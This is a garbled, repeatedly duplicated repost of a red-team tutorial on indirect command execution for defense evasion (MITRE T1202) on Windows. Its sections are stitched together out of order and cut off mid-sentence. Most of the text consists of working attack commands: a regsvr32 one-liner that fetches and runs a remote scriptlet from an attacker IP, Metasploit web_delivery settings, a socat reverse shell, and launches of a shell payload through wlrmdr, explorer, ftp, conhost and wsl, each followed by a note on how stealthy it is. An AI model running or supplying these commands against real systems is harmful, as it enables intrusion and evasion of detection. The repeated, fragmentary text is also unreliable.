SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct scrobj.dll"
https://blogger.googleusercontent.com/img/a/AVvXsEgqG1KsczzhWRW8x3HazANBsmyI_VHOk0J-uxm7YXNQu8lOwqe3LOZgIBC1WN7g5kmOABqU4aDbG74oP_xh9_J8GjrnZ1jdpIJ7m-a90JK2g69GSg5ZW1Gk1nQce_qaI1gGy6gDDJv0Kb_wVdGdDn1bPj3FkyAFsinLlhY3jIsTVIAz0evzjdSWhIbjXA=s16000
On our Metasploit console, we receive a reverse shell!
https://blogger.googleusercontent.com/img/a/AVvXsEgO_2N4tjtyKveH-olTH4fZpNJcRLaQC25Q0pC-nZgaGXCz9B-kURYR-RDPcKg5nVAJrOg-QyvGU88rdmju_6wvCugH__KKEIIJLE-pcMS6mF2vS9VkKFS29seXEjZ5N_PZiNhfbAT3hdtgLvcXxA1520YB--lsQBOggCnbnPM-X2t7lAvwT7WEAvCXvg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.
https://blogger.googleusercontent.com/img/a/AVvXsEgOXO0Eh_DIXiKud5UwA8fjqPUKeB-_PUCd3I_HOkDoMOfiolvwqLSVHvF_0eNFmhDtON6V3U6ScmP9oifm9pjw2zQqq73yu5SaglsgjVit9lRcMVcKspSfUzCqUw7ohrYjg6h6fpmtVMC73if2jn090bSYJhfDlBNyaF8ZU_BkoXRhAkLGe_fk0-o9RA=s16000 Method 5 – wlrmdr.exeWindows Logon Reminder (wlrmdr.exe) is an executable file available by default in Microsoft which often throws up balloon reminders saying that Windows needs to lock and unlock the device in order to update windows login credentials. Here, this tool is taking a bunch of flags for input.
-s : Time to show notification in milliseconds. Use 0 to display the notification without a timeout.
-f ___________________________
@hacking_Attack
@Hacking_Video
SyncAppvPublishingServer.vbs "n; Start-Process C:\Users\Public\shell.exe"
https://blogger.googleusercontent.com/img/a/AVvXsEi51JoJQetwyc_mQt5oHfHeaLdXODKEBhwAzqEuPnL5RLdURtBBspCS68pMrxpf5MjPOGhfkptKIy6cz8ihry6a9hnMROJK5SEGvIz6Bmpkv4csZmpG8j_o2KYX-yAgbukHtBFV_xbuKaSLUIGphmba-zgbyNBjrDeocGNK8PmBplQv5wfIhgV3FPFW-A=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEijX6I0yLkAnhOzf9EhO9FoSLZpxFt4757t-6KkFjxxEAnvXtPDuXAERujjyg-ujKDqAV-D5V5gSmpTTuKFwkCSLtHpGyYmwCne6Y0fQucARcXdWYUFcClMhVdi1W6pbpqLAt4o1_IUFDRNY1Plj-9UYO23aOtc49ZMWZglh_HMuc3bTzNtbDvHHWm6Xw=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.
https://blogger.googleusercontent.com/img/a/AVvXsEi7EEmM0KIO-tgMkRAm1Bx-1buqfjYzlJr9I-078FRm7f_S6skSP7euJRH2VOdihTbA2wgwkV6OX9sN21QFHGVrqWEw3nz4NN2OQXvOty_Vi_Z-WhY3CIHrsuog4rMJxvWeJLRjAtJRM-MwhkPzm7RHnNBXqXNfIlshJgd3djMQjCEsZTSHvd_d6p8ihQ=s16000
Since just passing in the exe’s path can make the VBS script execute it, we can also use the regsrv32 method in Metasploit.
use multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.89
set lport 1337
set target 3
run
https://blogger.googleusercontent.com/img/a/AVvXsEi1xPz1hS2IxgvCBLTQ3ygUnFXIrcP0KhK2TuMuniUkcE0FZI3CfAj6tsQUKZ1uaTaQd4vHW_2bShfwrw_vLnbM0DIGOlhqHnJPWu8upLlts-f1AWYxBFjxar-ubp_ezlGCmKesJhAQbdh2f6M99MVqx66G9BCpCzt3O9qttCfaalQaRC4MV37ciQLBiQ=s16000
Now, we can inject this command into the SyncAppvPublishingServer.vbs script by giving a break clause and then the one liner.
SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct scrobj.dll"
https://blogger.googleusercontent.com/img/a/AVvXsEgqG1KsczzhWRW8x3HazANBsmyI_VHOk0J-uxm7YXNQu8lOwqe3LOZgIBC1WN7g5kmOABqU4aDbG74oP_xh9_J8GjrnZ1jdpIJ7m-a90JK2g69GSg5ZW1Gk1nQce_qaI1gGy6gDDJv0Kb_wVdGdDn1bPj3FkyAFsinLlhY3jIsTVIAz0evzjdSWhIbjXA=s16000
On our Metasploit console, we receive a reverse shell!
https://blogger.googleusercontent.com/img/a/AVvXsEgO_2N4tjtyKveH-olTH4fZpNJcRLaQC25Q0pC-nZgaGXCz9B-kURYR-RDPcKg5nVAJrOg-QyvGU88rdmju_6wvCugH__KKEIIJLE-pcMS6mF2vS9VkKFS29seXEjZ5N_PZiNhfbAT3hdtgLvcXxA1520YB--lsQBOggCnbnPM-X2t7lAvwT7WEAvCXvg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.
https://blogger.googleusercontent.com/img/a/AVvXsEgOXO0Eh_DIXiKud5UwA8fjqPUKeB-_PUCd3I_HOkDoMOfiolvwqLSVHvF_0eNFmhDtON6V3U6ScmP9oifm9pjw2zQqq73yu5SaglsgjVit9lRcMVcKspSfUzCqUw7ohrYjg6h6fpmtVMC73if2jn090bSYJhfDlBNyaF8ZU_BkoXRhAkLGe_fk0-o9RA=s16000 Method 5 – wlrmdr.exeWindows Logon Reminder (wlrmdr.exe) is an executable file available by default in Microsoft which often throws up balloon reminders saying that Windows needs to lock and unlock the device in order to update windows login credentials. Here, this tool is taking a bunch of flags for input.
-s : Time to show notification in milliseconds. Use 0 to display the notification without a timeout.
-f ___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
can also be indirectly used for executing EXE. This is achieved by .NET cmdlet known as “Start-Process” SyncAppvPublishingServer.vbs "n; Start-Process C:\Users\Public\shell.exe" https://blogger.googleusercontent.com/img/a/AVvXsEi51JoJQetwyc_mQt5oHfHeaLdX…
-u: Executable to run
wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEhDq7ZEecb6yay2IZxMuoFnPveACrfzURZCOepDSRKeitTM9CjN412UoMl9keL3oz3Rlz1SbLX1uPC0M9Akch6B50n5TvAZpLWqHERGZbpz6-JHP9NpX2Ts2NnQColfZnIOZEax6v8h6IjENeP-38qZ_y1soCHZeRIscQjzwsvYhGel_1lV4uwGta1VPQ=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe as a standalone has been spawned.
https://blogger.googleusercontent.com/img/a/AVvXsEjWft7i4-wKiJZoqxZgH__WNHUo0D-Q290MVr2hn0T8TrQSRHpSfaK68V950lt5AA9DL_kgFtDr7sH-RtNLq7RzA43KeY-3B9sTn4MwF72Hxd2G2A1QVahXmIV-mseAPszUpWXYjzh0DXA1ZUC7j6d9jylftt18Hekr9VrZyl6g3daI-2gkQN7YeTnfTQ=s16000 Method 6 – explorer.exeExplorer.exe is the executable run when a user opens the file manager. The path bar where the current working directory is mentioned also serves as a run prompt kind of a thing where if you input name of a binary it spawns (like cmd.exe). Moreover, the binary is spawned as a child process of explorer.exe. This can be achieved via the command line too.
explorer.exe /root,"C:\Users\Public\shell.exe"
https://blogger.googleusercontent.com/img/a/AVvXsEiFFhILJJ_58lfvZjDYd0KdOnRaGtKPj0YBmV9aEgR-zE3ZOFysO-OzBjF2XgRvigahG5IbVC1wgY5SVkvQUuFoGmXBXTo5mtiHa6Q94Rsla8zqAGXb3Yn8KIM_ZZ3wdkLclvpQlFVxDPRMU1Vfk9tHE3PY5aamA7iV3-0lbXV-mJPhAJzYqp-tw-KsEA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEgsOvCcmxhgWIK_sGBq8OUzrG6P7BAehNWZ4Eci3k-GRi0UK23c_V5Iu6zDr0qesU890wGkyu4qeSQYxR2xJld6WSO2Sqit1GjcOM0U3ebEM1bHpeL1HbpQ4oPYMkOqHmC1Ktq8HSSJ8sho2H0smoW_gTT0owbg-yPPAkT8-18E4tTCqa0VYkKb1CGKEQ=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, cmd.exe has been spawned which in turn runs our shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEiCrXtqRnJohXGBUYaN-9g96MEFS_RGh2fYX-j_rRx3DfDqDHvo4Z58MtrwS3twkXArTq6xGdmqS8SG_7K3GJRtW8FU6l7SnzZVltRuN71THxsxGe9BWSYrVPIxlmLu6ZRFvu4zxM9j6ho9P2KpZloo6WUT_QioXI0YvTp1--FuK0bIWkRbgGnZQpIbSA=s16000 Method 7 – cmd.exeCmd.exe is the command prompt (terminal) of Windows and is capable of executing binaries using the /c flag. One can indirectly execute a malicious file using cmd.exe like so:
cmd.exe /c C:\Users\Public\shell.exe
Moreover, an attacker may also benefit from the lesser-known path traversal execution method. This lets an attacker traverse back to explorer.exe and use that to initiate the process for “shell.exe.” This complicates the analysis part for a blue teamer and is considered better than the previous method.
cmd.exe /c "ignite.local /../../../../../../../../../../windows/explorer.exe" /root,C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEgqmG7357TPZiflCYNmR-zAn6A1_Fy8G6sZgPFJRQQ0gcxsS1YeyObFwBuPShBGCSLAXNkwb-niUD8FAGLb_Nh3kYO1BAnjHEBMhg_6xjpt_RG02tUr12Dl0AZyB_0a6OIeGmsgHDFVUVZaOljSQrPkueoHUPc82-EiU5qaSLEMrZdYkbDlNLHZKw_-JA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEju3issag8G95TqmxLpwPjDjEcdNN2NGIlpeakrYCBARABsCJaIZjWgNhK_SaZ1Hh80tBjxFeK6g_2F605vFvidL0oVGCgsGZBiI4y-wp9CzoO18bvl2VYBh_vhwz1QymNEw0P54P13TvLsRrsDL3yVv3Fr_98IK_K8ro81xzg9QVgUuiXKNiU8Iu2LOw=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost (masking our shell) has been spawned as a child process under explorer.exe process[...]
___________________________
@hacking_Attack
@Hacking_Video
wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEhDq7ZEecb6yay2IZxMuoFnPveACrfzURZCOepDSRKeitTM9CjN412UoMl9keL3oz3Rlz1SbLX1uPC0M9Akch6B50n5TvAZpLWqHERGZbpz6-JHP9NpX2Ts2NnQColfZnIOZEax6v8h6IjENeP-38qZ_y1soCHZeRIscQjzwsvYhGel_1lV4uwGta1VPQ=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe as a standalone has been spawned.
https://blogger.googleusercontent.com/img/a/AVvXsEjWft7i4-wKiJZoqxZgH__WNHUo0D-Q290MVr2hn0T8TrQSRHpSfaK68V950lt5AA9DL_kgFtDr7sH-RtNLq7RzA43KeY-3B9sTn4MwF72Hxd2G2A1QVahXmIV-mseAPszUpWXYjzh0DXA1ZUC7j6d9jylftt18Hekr9VrZyl6g3daI-2gkQN7YeTnfTQ=s16000 Method 6 – explorer.exeExplorer.exe is the executable run when a user opens the file manager. The path bar where the current working directory is mentioned also serves as a run prompt kind of a thing where if you input name of a binary it spawns (like cmd.exe). Moreover, the binary is spawned as a child process of explorer.exe. This can be achieved via the command line too.
explorer.exe /root,"C:\Users\Public\shell.exe"
https://blogger.googleusercontent.com/img/a/AVvXsEiFFhILJJ_58lfvZjDYd0KdOnRaGtKPj0YBmV9aEgR-zE3ZOFysO-OzBjF2XgRvigahG5IbVC1wgY5SVkvQUuFoGmXBXTo5mtiHa6Q94Rsla8zqAGXb3Yn8KIM_ZZ3wdkLclvpQlFVxDPRMU1Vfk9tHE3PY5aamA7iV3-0lbXV-mJPhAJzYqp-tw-KsEA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEgsOvCcmxhgWIK_sGBq8OUzrG6P7BAehNWZ4Eci3k-GRi0UK23c_V5Iu6zDr0qesU890wGkyu4qeSQYxR2xJld6WSO2Sqit1GjcOM0U3ebEM1bHpeL1HbpQ4oPYMkOqHmC1Ktq8HSSJ8sho2H0smoW_gTT0owbg-yPPAkT8-18E4tTCqa0VYkKb1CGKEQ=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, cmd.exe has been spawned which in turn runs our shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEiCrXtqRnJohXGBUYaN-9g96MEFS_RGh2fYX-j_rRx3DfDqDHvo4Z58MtrwS3twkXArTq6xGdmqS8SG_7K3GJRtW8FU6l7SnzZVltRuN71THxsxGe9BWSYrVPIxlmLu6ZRFvu4zxM9j6ho9P2KpZloo6WUT_QioXI0YvTp1--FuK0bIWkRbgGnZQpIbSA=s16000 Method 7 – cmd.exeCmd.exe is the command prompt (terminal) of Windows and is capable of executing binaries using the /c flag. One can indirectly execute a malicious file using cmd.exe like so:
cmd.exe /c C:\Users\Public\shell.exe
Moreover, an attacker may also benefit from the lesser-known path traversal execution method. This lets an attacker traverse back to explorer.exe and use that to initiate the process for “shell.exe.” This complicates the analysis part for a blue teamer and is considered better than the previous method.
cmd.exe /c "ignite.local /../../../../../../../../../../windows/explorer.exe" /root,C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEgqmG7357TPZiflCYNmR-zAn6A1_Fy8G6sZgPFJRQQ0gcxsS1YeyObFwBuPShBGCSLAXNkwb-niUD8FAGLb_Nh3kYO1BAnjHEBMhg_6xjpt_RG02tUr12Dl0AZyB_0a6OIeGmsgHDFVUVZaOljSQrPkueoHUPc82-EiU5qaSLEMrZdYkbDlNLHZKw_-JA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEju3issag8G95TqmxLpwPjDjEcdNN2NGIlpeakrYCBARABsCJaIZjWgNhK_SaZ1Hh80tBjxFeK6g_2F605vFvidL0oVGCgsGZBiI4y-wp9CzoO18bvl2VYBh_vhwz1QymNEw0P54P13TvLsRrsDL3yVv3Fr_98IK_K8ro81xzg9QVgUuiXKNiU8Iu2LOw=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost (masking our shell) has been spawned as a child process under explorer.exe process[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
-u: Executable to run wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\shell.exe https://blogger.googleusercontent.com/img/a/AVvXsEhDq7ZEecb6yay2IZxMuoFnPveACrfzURZCOepDSRKeitTM9CjN412UoMl9keL3oz3Rlz1SbLX1uPC0M9Akch6B50n5TvAZpLWqHERGZbpz6-JHP9…
and is stealthier.
https://blogger.googleusercontent.com/img/a/AVvXsEg-AwW4oIdW643TkvqkTQziq_K4CGFRViYWspBt8v9cHzz-Bdi64z08azWBgSxb4pItlZMGY25X5sXEyvkO4pGOYVVUcGgVIK_CC_RET46Dsll4upFP41CzPkqfH4eHtafjIl2mIYW93Heo6_6JK6Vd3B2bdIz7egfNbTL6giekJwk0RD_NxmjbS3v7iQ=s16000 Method 8 – ftp.exeNewer versions of Windows 10 and 11 come with a ftp.exe binary already included with the default installation. Moreover, it is available in the system PATH variable and can be executed from any working directory. Thereafter, we can load the command we want to run in a text file called “script.txt” and execute it using the ftp -s option which executes text files as a script. Hence, we include the explorer.exe command in this script and execute it using ftp.
echo !explorer.exe /root,"C:\Users\Public\shell.exe" > script.txt && ftp -s:script.txt
https://blogger.googleusercontent.com/img/a/AVvXsEiPtvd4JhzWG5hmreHbVQzsP1qwQrYKijhJNHpHlrq7eE0OVHw1d0T4qbngV4qNN0s2T6Vp07JiFtcJkKBKjhYVVxI87UqN6SkXXCdkNXp79C582BQ0oKoCoX8r3pxgr1XkK1ypeQeJM1eVg_AwFlIf3Ocmesg_mmjHVbHtcK58AMflqyMHXjGcoAIlqg=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjbRm30W3bOZn9ka-3C3POt32eh9pfO_j7vw23-bIw_gumr4A4qInUS-hsV6LlfSxpgjacebPZjVNSvKopCSfUuuJeupxeIAzqlIjQy4TuvvGnnSm0N46ujUTUOf_VcCEeZe50xsmVgtKy2j01HoDYnDwqIXaMRuIoDXvziSk0IGraMYROSW_rjADGQDw=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, an ftp instance is running with no notable indication of our shell.exe in processes making it stealthier.
https://blogger.googleusercontent.com/img/a/AVvXsEjfSfh0YergMJaSDKwYS8r0SwxNVPlEavWAExZ7C-Gw9WnwW4jKNxulnZduBgS30AlMMgEeOZarJTvRxVRjUnzkOvLD_sPK3brXmglepgLatQyR9JMXSmxTMl2bycPmSoZ-v9Mc5eSUjQN2pMJcb0hKKIJWFzW1Rxbi4YyujKFkEMmaS7k_yaJvkdJvig=s16000 Method 9 – conhost.exeConhost.exe stands for Console Host which was introduced with Windows 7. It is sort of a bridge between old school CRSS and cmd.exe. More information can be found here. In simpler terms it helps Command Prompt to interact with Windows explorer and provides functionality like drag and drop text from explorer to cmd.exe.
Conhost can also be used to launch arbitrary executables. Depending on which Windows version you are using the results may vary but as per Build 1809, I found it to be working.
conhost "ignite.local C:\Users\Public\shell.exe"
https://blogger.googleusercontent.com/img/a/AVvXsEjZZHpX82jke6s87hFOap2lQIqioMPgruyVXVcMW675bELlUzizx8J-3iwQkKGM5tq_JAasQQudoUjqob4gsiDF3L8_b4APEJaK4JKUyKBJtvy7Kp66yJVs6xuR6gLBtOz09NbkoB1qQ_219pT7LoGLsB5vLGxiIkdIXg19hGOiVhVZNBgvJoh_KC_emQ=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjEEGYYWdrbEb-sPTdfuGRknSa9H4SphbL5CzkyTZwpZFDsN5PrunOBdmZbD9IZ767-XRIR3K4gAsiQnkKNi63E-WsRYBb7cdgGmy_wuCPHDhvUQgayFfZOPumDqQufuG_aRR961XnYk7blv5gScQ5U4m2xrdS9DloQHcgbCl71ruUCq9R3MDpaGtMo-w=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost instance has been launched within a cmd.exe process. It is stealthy as compared to other methods as shell.exe isn’t seen in the process explorer.
https://blogger.googleusercontent.com/img/a/AVvXsEjH5eLwKd_X3pEU-jD03LcP9_eNE3erbe3sQh3Cmh8MTCVavfLcx2p62SeWTY-JZWzLKRd0pWz0M8vecbiuOxTEUfZgXPwmReMAC0PWp_4-A7pB5O30u6oJ2qHmLqb_JSKyi-9s1TbRU9aTaOkb-mj2mHeLg-ctAvurdtaYIeTcAkfHtBtGQTEBk_M6ew=s16000
Method 10 - WSL Only (bash.exe)
The next two methods are use-case specific. WSL stands for Windows Subsystem for Linux and can help a user install an instance of their favourite Linux distro onto Windows itself by creating a [...]
___________________________
@hacking_Attack
@Hacking_Video
https://blogger.googleusercontent.com/img/a/AVvXsEg-AwW4oIdW643TkvqkTQziq_K4CGFRViYWspBt8v9cHzz-Bdi64z08azWBgSxb4pItlZMGY25X5sXEyvkO4pGOYVVUcGgVIK_CC_RET46Dsll4upFP41CzPkqfH4eHtafjIl2mIYW93Heo6_6JK6Vd3B2bdIz7egfNbTL6giekJwk0RD_NxmjbS3v7iQ=s16000 Method 8 – ftp.exeNewer versions of Windows 10 and 11 come with a ftp.exe binary already included with the default installation. Moreover, it is available in the system PATH variable and can be executed from any working directory. Thereafter, we can load the command we want to run in a text file called “script.txt” and execute it using the ftp -s option which executes text files as a script. Hence, we include the explorer.exe command in this script and execute it using ftp.
echo !explorer.exe /root,"C:\Users\Public\shell.exe" > script.txt && ftp -s:script.txt
https://blogger.googleusercontent.com/img/a/AVvXsEiPtvd4JhzWG5hmreHbVQzsP1qwQrYKijhJNHpHlrq7eE0OVHw1d0T4qbngV4qNN0s2T6Vp07JiFtcJkKBKjhYVVxI87UqN6SkXXCdkNXp79C582BQ0oKoCoX8r3pxgr1XkK1ypeQeJM1eVg_AwFlIf3Ocmesg_mmjHVbHtcK58AMflqyMHXjGcoAIlqg=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjbRm30W3bOZn9ka-3C3POt32eh9pfO_j7vw23-bIw_gumr4A4qInUS-hsV6LlfSxpgjacebPZjVNSvKopCSfUuuJeupxeIAzqlIjQy4TuvvGnnSm0N46ujUTUOf_VcCEeZe50xsmVgtKy2j01HoDYnDwqIXaMRuIoDXvziSk0IGraMYROSW_rjADGQDw=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, an ftp instance is running with no notable indication of our shell.exe in processes making it stealthier.
https://blogger.googleusercontent.com/img/a/AVvXsEjfSfh0YergMJaSDKwYS8r0SwxNVPlEavWAExZ7C-Gw9WnwW4jKNxulnZduBgS30AlMMgEeOZarJTvRxVRjUnzkOvLD_sPK3brXmglepgLatQyR9JMXSmxTMl2bycPmSoZ-v9Mc5eSUjQN2pMJcb0hKKIJWFzW1Rxbi4YyujKFkEMmaS7k_yaJvkdJvig=s16000 Method 9 – conhost.exeConhost.exe stands for Console Host which was introduced with Windows 7. It is sort of a bridge between old school CRSS and cmd.exe. More information can be found here. In simpler terms it helps Command Prompt to interact with Windows explorer and provides functionality like drag and drop text from explorer to cmd.exe.
Conhost can also be used to launch arbitrary executables. Depending on which Windows version you are using the results may vary but as per Build 1809, I found it to be working.
conhost "ignite.local C:\Users\Public\shell.exe"
https://blogger.googleusercontent.com/img/a/AVvXsEjZZHpX82jke6s87hFOap2lQIqioMPgruyVXVcMW675bELlUzizx8J-3iwQkKGM5tq_JAasQQudoUjqob4gsiDF3L8_b4APEJaK4JKUyKBJtvy7Kp66yJVs6xuR6gLBtOz09NbkoB1qQ_219pT7LoGLsB5vLGxiIkdIXg19hGOiVhVZNBgvJoh_KC_emQ=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjEEGYYWdrbEb-sPTdfuGRknSa9H4SphbL5CzkyTZwpZFDsN5PrunOBdmZbD9IZ767-XRIR3K4gAsiQnkKNi63E-WsRYBb7cdgGmy_wuCPHDhvUQgayFfZOPumDqQufuG_aRR961XnYk7blv5gScQ5U4m2xrdS9DloQHcgbCl71ruUCq9R3MDpaGtMo-w=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost instance has been launched within a cmd.exe process. It is stealthy as compared to other methods as shell.exe isn’t seen in the process explorer.
https://blogger.googleusercontent.com/img/a/AVvXsEjH5eLwKd_X3pEU-jD03LcP9_eNE3erbe3sQh3Cmh8MTCVavfLcx2p62SeWTY-JZWzLKRd0pWz0M8vecbiuOxTEUfZgXPwmReMAC0PWp_4-A7pB5O30u6oJ2qHmLqb_JSKyi-9s1TbRU9aTaOkb-mj2mHeLg-ctAvurdtaYIeTcAkfHtBtGQTEBk_M6ew=s16000
Method 10 - WSL Only (bash.exe)
The next two methods are use-case specific. WSL stands for Windows Subsystem for Linux and can help a user install an instance of their favourite Linux distro onto Windows itself by creating a [...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
and is stealthier. https://blogger.googleusercontent.com/img/a/AVvXsEg-AwW4oIdW643TkvqkTQziq_K4CGFRViYWspBt8v9cHzz-Bdi64z08azWBgSxb4pItlZMGY25X5sXEyvkO4pGOYVVUcGgVIK_CC_RET46Dsll4upFP41CzPkqfH4eHtafjIl2mIYW93Heo6_6JK6Vd3B2bdIz7egfNbTL6giekJwk0RD_NxmjbS3v7iQ=s16000…
subsystem. Here, the victim has installed an Ubuntu instance in WSL. It can be installed by instructions provided here.
https://blogger.googleusercontent.com/img/a/AVvXsEjX4UB9zDDk1rAg-5vg7tIHyMLKVs8zdoyKIqNy8vKy8G42l74aSJllzAxjHQnAEQE4GJ3zCVIN8MiMbwjySV4MvkzF_rjs-zveqd_RYsiCJxxCIRn5I0_yjhVeQzNEqWwgIQHILI7rsbuI4p6LaLy50FgzcYaBnZgbVSHIIa5O2x3_Sr_tUOxgeHI9_g=s16000
If the victim has a WSL installed with socat package, bash.exe present in the system can be used to obtain a reverse shell like so:
bash.exe -c "socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane"
https://blogger.googleusercontent.com/img/a/AVvXsEjlMqohYTCrWXdeE1EMDrJ1_TWQue_NK4InmPw6KRGLtY3_b-AaWZBkvtuM6wym4XFN_jE9HwdVYw79JNFW1Ss-9Su37do4nyhF6rNLhSdtDV_4T6o-qu3uZ_tc9-KdFHQsLdzVbUsbgrj-wKzz9q23GD3zK7_paGAHXWyGHvkGeJ0olVrwci-W4Mt0iA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjpXVCPNDTKhso1d2GAWMlDx_Qo6Yi2WY6dU2CNv_6JyaHLs_B5HJMS18fNYxb6Oi_nWPVWW3shkI48YPuq1e8Suof-9vvxeyDu_aMBwSbmYeK39jN28GLqkBpUFfQdJ9Biqx-0s7QpI7ErRuKX20wBX_sV5mjGT_JmB8_q-sojIXHRu-uAxvtwpE3QRg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a socat and bash process. It is stealthy.
https://blogger.googleusercontent.com/img/a/AVvXsEittt9rmUo3xjNP73neVdVtzBTD25VwdOq4t1tR-_2WDNteK_x1lW0iiXGsJhuGo91S1EMsUSZA3C5PjqcpRX0l2LSC-5gpybV4C77JgokfV74rmaigrsi_k-HfnVlSJl4rGjLj31r2mZrsi7z-siH2ulQonRSAD4njrovkpWzL_S4u-sXG8vs9228xEw=s16000 Method 11 – WSL Only (wsl.exe)Socat instance on a WSL is plausible but not necessary. However, an executable called wsl.exe is present by default in the Windows system where WSL is installed. This exe can be used to launch the exe present in WSL. This way, the shell will be launched indirectly.
wsl.exe -e /mnt/c/Users/Public/shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEjx-BRKTlxOyVryZf57AMZchGXcj8MIPICRgIjiT0Wrob-TVJHe2wqbMuHI4v4LvsQ6OVKHP50p7vkBKzjFJAgDCG-RTL4XsQgYLUnAt0OrR8rF6OfqZ61F1zmmgc9oCxWXcRZDpQLlRHzZOyl5uJv5qdNtGYyAkemBjiO8F79cqPLoCsQRSCGEWjOkjw=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEg4EEg01VCw-3AGHwtyo0vjmU0xxZ240u-VZLHHOGFF3TGqzXsQz9xN_e93QKzPf2AsFOUNj9JhlicfTdlt0ns33r9Hq4MxQ1_s_v2ovNgdJj5xusvc_hn8Q3To-IUQ3AEJuewSKzGxDxOSjWPcN3mk_tDOqS2Np0jlTPaUZIKZ2C0AgIFZT-yYBSlumg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a shell.exe process. It is not as stealthy as other methods.
https://blogger.googleusercontent.com/img/a/AVvXsEiQ9zeo7Lkaklvr1zFEz3oV258i8d72wwQm50dhTjQnXZPO8KUfZljobgM896sKQrdHVXVkDLTSo-acnHMHASUE4dyoB6F9rAt_XSkJI7YudulLl0xct8ouKicvOWiHZudk1Z-HtUXnAo1vM8y97lbevGRTuBxD8RZOTb750PzjwXuJ9PAkzu6pOSe4Tw=s16000 ConclusionWhile some of the methods defined above are stealthy, others create some noise. Red Teamers must evaluate which method they want to use in order for them to conduct operations smoothly. The aim of the article was to demonstrate as many methods as possible for indirect command execution in order for a user to evade defenses easily. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here
The post Indirect Command Execution: Defense Evasion (T1202) appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
https://blogger.googleusercontent.com/img/a/AVvXsEjX4UB9zDDk1rAg-5vg7tIHyMLKVs8zdoyKIqNy8vKy8G42l74aSJllzAxjHQnAEQE4GJ3zCVIN8MiMbwjySV4MvkzF_rjs-zveqd_RYsiCJxxCIRn5I0_yjhVeQzNEqWwgIQHILI7rsbuI4p6LaLy50FgzcYaBnZgbVSHIIa5O2x3_Sr_tUOxgeHI9_g=s16000
If the victim has a WSL installed with socat package, bash.exe present in the system can be used to obtain a reverse shell like so:
